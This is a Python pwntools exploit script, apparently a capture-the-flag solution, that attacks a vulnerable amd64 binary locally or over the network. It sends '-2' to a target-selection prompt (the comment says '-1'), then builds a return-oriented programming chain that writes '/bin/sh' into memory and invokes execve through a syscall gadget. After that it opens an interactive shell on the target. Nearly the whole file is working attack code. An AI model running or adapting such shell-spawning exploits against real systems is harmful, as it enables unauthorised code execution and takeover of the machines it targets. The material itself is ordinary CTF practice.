from pwn import *  # Import pwntools
from pprint import pprint

def connect(args):
    # Establish either a local or remote connection
    if args.remote and args.host and args.port:
        conn = remote(args.host, args.port)
        print(f"Connecting to {args.host}:{args.port}")
    elif args.local and args.binary:
        conn = process(args.binary)
        print(f"Launching local binary: {args.binary}")
    else:
        print("Error: You must specify either --remote with host and port or --local with a binary path.")
        return
    return conn


def main():
    import argparse
    parser = argparse.ArgumentParser(description="CTF Exploit Script")
    parser.add_argument("--remote", action="store_true", help="Use remote connection")
    parser.add_argument("--host", type=str, help="Remote host")
    parser.add_argument("--port", type=int, help="Remote port")
    parser.add_argument("--local", action="store_true", help="Run local binary")
    parser.add_argument("--binary", type=str, help="Path to local binary")
    parser.add_argument("--debug", action="store_true", help="Enable debugging")
    args = parser.parse_args()

    conn = connect(args)

    if args.debug:
        context.log_level = 'debug'
    context.arch = 'amd64'

    # Receive until we encounter the question mark (?) in the challenge prompt
    conn.recvuntil(b"Select target to shoot: ")

    # Send "-1" as requested by the challenge
    conn.sendline(b"-2")

    conn.recvuntil(b"> ")

    # Load the binary
    binary = ELF(args.binary, checksec=False)
    rop = ROP(binary)

    bss_address = binary.get_section_by_name('.data').header.sh_addr

    # Gadgets
    pop_rax = rop.find_gadget(['pop rax', 'ret'])[0]
    pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
    pop_rsi = rop.find_gadget(['pop rsi', 'ret'])[0]
    pop_rdx = rop.find_gadget(['pop rdx', 'ret'])[0]
    #mov_qword_ptr_rdi_rax = rop.find_gadget(['mov qword ptr [rdi], rax', 'ret'])[0]
    mov_qword_ptr_rdi_rax = p64(0x00000000004020f5)
    syscall = rop.find_gadget(['syscall', 'ret'])[0]

    # ROP chain
    rop_chain = [
        pop_rdi, bss_address,             # Set rdi to bss_address
        pop_rax, u64(b'/bin/sh\x00'),     # Set rax to '/bin/sh\x00'
        mov_qword_ptr_rdi_rax,            # Write rax to [rdi]
        pop_rsi, 0,                       # Set rsi to NULL
        pop_rdx, 0,                       # Set rdx to NULL
        pop_rax, 59,                      # Set rax to execve syscall number (59)
        syscall                           # Invoke execve
    ]

    # Payload
    payload = flat(
        b'A' * 0x8,  # Padding to reach return address
        *rop_chain,
        b'\n'
    )

    #pause()
    conn.send(payload)

    # Open an interactive shell after sending the payload
    conn.interactive()

if __name__ == "__main__":
    main()

